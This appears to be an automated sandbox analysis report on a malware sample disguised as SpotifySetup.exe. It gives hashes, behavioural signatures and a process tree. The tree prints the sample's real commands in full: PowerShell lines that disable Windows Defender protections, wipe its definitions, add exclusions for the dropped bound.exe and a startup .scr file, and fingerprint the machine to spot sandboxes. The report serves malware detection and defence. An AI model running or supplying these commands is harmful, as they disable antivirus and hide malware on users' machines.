Analysis
-
max time kernel
209s -
max time network
206s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
21-06-2024 23:35
Behavioral task
behavioral1
Sample
SpotifySetup.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
SpotifySetup.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
V�k�7�.pyc
Resource
win7-20240508-en
Behavioral task
behavioral4
Sample
V�k�7�.pyc
Resource
win10v2004-20240508-en
General
-
Target
SpotifySetup.exe
-
Size
6.8MB
-
MD5
e58de2d31fe7a07e75f79e76ca79ba95
-
SHA1
a918c93c009c84f98c055926da540558342be0df
-
SHA256
b4579cb6e46b23c09e34d93fbd190e32ae7a407e5dedba99dcabcdd4b3acc7f1
-
SHA512
ae6ebeb52c720c5e546bddbeacae2b72f19bdfe4fd21dbbf2b6d6fdfebb21eabfb752dc6f6b76cf365345f686668df290da80756f68d70757818aed49d23ade0
-
SSDEEP
196608:ZRuyH1g16gQ49hoy6Enwc4GgpG0REtHIrq7LrtrbWOjgWyI:ZcXZWyotGgpGLtz7ntrbvMWyI
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 4784 powershell.exe 3708 powershell.exe 2396 powershell.exe -
ACProtect 1.3x - 1.4x DLL software 16 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI39962\python311.dll acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\_ctypes.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\libffi-8.dll acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\_bz2.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\_ssl.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\_sqlite3.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\_socket.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\_queue.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\_lzma.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\_hashlib.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\_decimal.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\unicodedata.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\sqlite3.dll acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\select.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\libssl-1_1.dll acprotect C:\Users\Admin\AppData\Local\Temp\_MEI39962\libcrypto-1_1.dll acprotect -
Executes dropped EXE 1 IoCs
Processes:
bound.exepid process 908 bound.exe -
Loads dropped DLL 17 IoCs
Processes:
SpotifySetup.exepid process 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe 3308 SpotifySetup.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI39962\python311.dll upx behavioral2/memory/3308-26-0x0000000075650000-0x0000000075B5B000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\libffi-8.dll upx behavioral2/memory/3308-30-0x0000000075600000-0x000000007561F000-memory.dmp upx behavioral2/memory/3308-33-0x00000000755F0000-0x00000000755FD000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI39962\libcrypto-1_1.dll upx behavioral2/memory/3308-56-0x00000000755C0000-0x00000000755E7000-memory.dmp upx behavioral2/memory/3308-58-0x00000000755A0000-0x00000000755B8000-memory.dmp upx behavioral2/memory/3308-60-0x0000000075580000-0x000000007559B000-memory.dmp upx behavioral2/memory/3308-62-0x0000000075440000-0x0000000075577000-memory.dmp upx behavioral2/memory/3308-66-0x00000000753D0000-0x00000000753DC000-memory.dmp upx behavioral2/memory/3308-65-0x0000000075420000-0x0000000075436000-memory.dmp upx behavioral2/memory/3308-68-0x00000000753A0000-0x00000000753C8000-memory.dmp upx behavioral2/memory/3308-73-0x00000000750A0000-0x00000000752FA000-memory.dmp upx behavioral2/memory/3308-72-0x0000000075300000-0x0000000075394000-memory.dmp upx behavioral2/memory/3308-77-0x0000000075030000-0x0000000075040000-memory.dmp upx behavioral2/memory/3308-80-0x0000000075020000-0x000000007502C000-memory.dmp upx behavioral2/memory/3308-79-0x0000000075600000-0x000000007561F000-memory.dmp upx behavioral2/memory/3308-76-0x0000000075650000-0x0000000075B5B000-memory.dmp upx behavioral2/memory/3308-83-0x00000000755F0000-0x00000000755FD000-memory.dmp upx behavioral2/memory/3308-84-0x0000000074EF0000-0x0000000075009000-memory.dmp upx behavioral2/memory/3308-171-0x0000000075580000-0x000000007559B000-memory.dmp upx behavioral2/memory/3308-172-0x0000000075650000-0x0000000075B5B000-memory.dmp upx behavioral2/memory/3308-187-0x0000000075440000-0x0000000075577000-memory.dmp upx behavioral2/memory/3308-186-0x0000000074EF0000-0x0000000075009000-memory.dmp upx behavioral2/memory/3308-183-0x00000000750A0000-0x00000000752FA000-memory.dmp upx behavioral2/memory/3308-182-0x0000000075300000-0x0000000075394000-memory.dmp upx behavioral2/memory/3308-181-0x00000000753A0000-0x00000000753C8000-memory.dmp upx behavioral2/memory/3308-179-0x0000000075420000-0x0000000075436000-memory.dmp upx behavioral2/memory/3308-173-0x0000000075600000-0x000000007561F000-memory.dmp upx behavioral2/memory/3308-190-0x0000000075650000-0x0000000075B5B000-memory.dmp upx behavioral2/memory/3308-233-0x0000000075650000-0x0000000075B5B000-memory.dmp upx behavioral2/memory/3308-248-0x0000000075650000-0x0000000075B5B000-memory.dmp upx -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
bound.exepid process 908 bound.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Modifies registry class 1 IoCs
Processes:
taskmgr.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exepid process 3708 powershell.exe 4932 powershell.exe 4784 powershell.exe 4784 powershell.exe 3708 powershell.exe 4932 powershell.exe 2396 powershell.exe 2396 powershell.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exepowershell.exepowershell.exepowershell.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2908 tasklist.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeIncreaseQuotaPrivilege 2216 WMIC.exe Token: SeSecurityPrivilege 2216 WMIC.exe Token: SeTakeOwnershipPrivilege 2216 WMIC.exe Token: SeLoadDriverPrivilege 2216 WMIC.exe Token: SeSystemProfilePrivilege 2216 WMIC.exe Token: SeSystemtimePrivilege 2216 WMIC.exe Token: SeProfSingleProcessPrivilege 2216 WMIC.exe Token: SeIncBasePriorityPrivilege 2216 WMIC.exe Token: SeCreatePagefilePrivilege 2216 WMIC.exe Token: SeBackupPrivilege 2216 WMIC.exe Token: SeRestorePrivilege 2216 WMIC.exe Token: SeShutdownPrivilege 2216 WMIC.exe Token: SeDebugPrivilege 2216 WMIC.exe Token: SeSystemEnvironmentPrivilege 2216 WMIC.exe Token: SeRemoteShutdownPrivilege 2216 WMIC.exe Token: SeUndockPrivilege 2216 WMIC.exe Token: SeManageVolumePrivilege 2216 WMIC.exe Token: 33 2216 WMIC.exe Token: 34 2216 WMIC.exe Token: 35 2216 WMIC.exe Token: 36 2216 WMIC.exe Token: SeIncreaseQuotaPrivilege 2216 WMIC.exe Token: SeSecurityPrivilege 2216 WMIC.exe Token: SeTakeOwnershipPrivilege 2216 WMIC.exe Token: SeLoadDriverPrivilege 2216 WMIC.exe Token: SeSystemProfilePrivilege 2216 WMIC.exe Token: SeSystemtimePrivilege 2216 WMIC.exe Token: SeProfSingleProcessPrivilege 2216 WMIC.exe Token: SeIncBasePriorityPrivilege 2216 WMIC.exe Token: SeCreatePagefilePrivilege 2216 WMIC.exe Token: SeBackupPrivilege 2216 WMIC.exe Token: SeRestorePrivilege 2216 WMIC.exe Token: SeShutdownPrivilege 2216 WMIC.exe Token: SeDebugPrivilege 2216 WMIC.exe Token: SeSystemEnvironmentPrivilege 2216 WMIC.exe Token: SeRemoteShutdownPrivilege 2216 WMIC.exe Token: SeUndockPrivilege 2216 WMIC.exe Token: SeManageVolumePrivilege 2216 WMIC.exe Token: 33 2216 WMIC.exe Token: 34 2216 WMIC.exe Token: 35 2216 WMIC.exe Token: 36 2216 WMIC.exe Token: SeIncreaseQuotaPrivilege 4304 WMIC.exe Token: SeSecurityPrivilege 4304 WMIC.exe Token: SeTakeOwnershipPrivilege 4304 WMIC.exe Token: SeLoadDriverPrivilege 4304 WMIC.exe Token: SeSystemProfilePrivilege 4304 WMIC.exe Token: SeSystemtimePrivilege 4304 WMIC.exe Token: SeProfSingleProcessPrivilege 4304 WMIC.exe Token: SeIncBasePriorityPrivilege 4304 WMIC.exe Token: SeCreatePagefilePrivilege 4304 WMIC.exe Token: SeBackupPrivilege 4304 WMIC.exe Token: SeRestorePrivilege 4304 WMIC.exe Token: SeShutdownPrivilege 4304 WMIC.exe Token: SeDebugPrivilege 4304 WMIC.exe Token: SeSystemEnvironmentPrivilege 4304 WMIC.exe Token: SeRemoteShutdownPrivilege 4304 WMIC.exe Token: SeUndockPrivilege 4304 WMIC.exe Token: SeManageVolumePrivilege 4304 WMIC.exe Token: 33 4304 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exepid process 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe 4712 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SpotifySetup.exeSpotifySetup.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3996 wrote to memory of 3308 3996 SpotifySetup.exe SpotifySetup.exe PID 3996 wrote to memory of 3308 3996 SpotifySetup.exe SpotifySetup.exe PID 3996 wrote to memory of 3308 3996 SpotifySetup.exe SpotifySetup.exe PID 3308 wrote to memory of 5032 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 5032 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 5032 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 2236 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 2236 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 2236 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 548 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 548 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 548 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 4572 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 4572 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 4572 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 4992 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 4992 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 4992 3308 SpotifySetup.exe cmd.exe PID 4992 wrote to memory of 2908 4992 cmd.exe tasklist.exe PID 4992 wrote to memory of 2908 4992 cmd.exe tasklist.exe PID 4992 wrote to memory of 2908 4992 cmd.exe tasklist.exe PID 5032 wrote to memory of 4784 5032 cmd.exe powershell.exe PID 5032 wrote to memory of 4784 5032 cmd.exe powershell.exe PID 5032 wrote to memory of 4784 5032 cmd.exe powershell.exe PID 548 wrote to memory of 3708 548 cmd.exe powershell.exe PID 548 wrote to memory of 3708 548 cmd.exe powershell.exe PID 548 wrote to memory of 3708 548 cmd.exe powershell.exe PID 2236 wrote to memory of 4932 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 4932 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 4932 2236 cmd.exe powershell.exe PID 4572 wrote to memory of 908 4572 cmd.exe bound.exe PID 4572 wrote to memory of 908 4572 cmd.exe bound.exe PID 3308 wrote to memory of 1088 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 1088 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 1088 3308 SpotifySetup.exe cmd.exe PID 1088 wrote to memory of 2216 1088 cmd.exe WMIC.exe PID 1088 wrote to memory of 2216 1088 cmd.exe WMIC.exe PID 1088 wrote to memory of 2216 1088 cmd.exe WMIC.exe PID 3308 wrote to memory of 4796 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 4796 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 4796 3308 SpotifySetup.exe cmd.exe PID 4796 wrote to memory of 2660 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2660 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2660 4796 cmd.exe reg.exe PID 3308 wrote to memory of 3280 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 3280 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 3280 3308 SpotifySetup.exe cmd.exe PID 3280 wrote to memory of 3664 3280 cmd.exe reg.exe PID 3280 wrote to memory of 3664 3280 cmd.exe reg.exe PID 3280 wrote to memory of 3664 3280 cmd.exe reg.exe PID 3308 wrote to memory of 2836 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 2836 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 2836 3308 SpotifySetup.exe cmd.exe PID 2836 wrote to memory of 4304 2836 cmd.exe WMIC.exe PID 2836 wrote to memory of 4304 2836 cmd.exe WMIC.exe PID 2836 wrote to memory of 4304 2836 cmd.exe WMIC.exe PID 3308 wrote to memory of 3484 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 3484 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 3484 3308 SpotifySetup.exe cmd.exe PID 3484 wrote to memory of 3076 3484 cmd.exe WMIC.exe PID 3484 wrote to memory of 3076 3484 cmd.exe WMIC.exe PID 3484 wrote to memory of 3076 3484 cmd.exe WMIC.exe PID 3308 wrote to memory of 4668 3308 SpotifySetup.exe cmd.exe PID 3308 wrote to memory of 4668 3308 SpotifySetup.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3308 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4784 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:908 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2908 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2660
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3664
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4304 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵PID:4668
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2396
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4712
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1980
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ .scrFilesize
6.8MB
MD5e58de2d31fe7a07e75f79e76ca79ba95
SHA1a918c93c009c84f98c055926da540558342be0df
SHA256b4579cb6e46b23c09e34d93fbd190e32ae7a407e5dedba99dcabcdd4b3acc7f1
SHA512ae6ebeb52c720c5e546bddbeacae2b72f19bdfe4fd21dbbf2b6d6fdfebb21eabfb752dc6f6b76cf365345f686668df290da80756f68d70757818aed49d23ade0
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD58ac5e780bfc82dd50924c40aa73fe81a
SHA16454c7fc3b018d9eb61e25987a462c56a2f716cc
SHA2569f75e7f0fef7bade8708623e601335f991cfb2d7b1b1092ca45ac691c2927c71
SHA5124ddfe91f7c543cb1ce50bc07de137e60e1f104c64c3142600550fb1d20dc2ea123095f6364f15a8ba9acaf0cbb15c91b08c6cf31decefc27c82efc4cbb01ab8d
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\VCRUNTIME140.dllFilesize
78KB
MD51e6e97d60d411a2dee8964d3d05adb15
SHA10a2fe6ec6b6675c44998c282dbb1cd8787612faf
SHA2568598940e498271b542f2c04998626aa680f2172d0ff4f8dbd4ffec1a196540f9
SHA5123f7d79079c57786051a2f7facfb1046188049e831f12b549609a8f152664678ee35ad54d1fff4447428b6f76bea1c7ca88fa96aab395a560c6ec598344fcc7fa
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\_bz2.pydFilesize
43KB
MD593c79a5faaa4d320432b06ae2879f1f4
SHA1772b881874a3947f2205644df6eba5972366aab6
SHA25602eda0188e989264ffb5bfe4474ef1bfa36f8a0baee6764e11b4aa604cc30d47
SHA5124757e41fa5260601246ee851d43fcffa17eb591dd4e5f987e18b77d9c3269431a610f9b32ebc507c64394c29afe3f7c030d5448417490431742c6c462f156b06
-
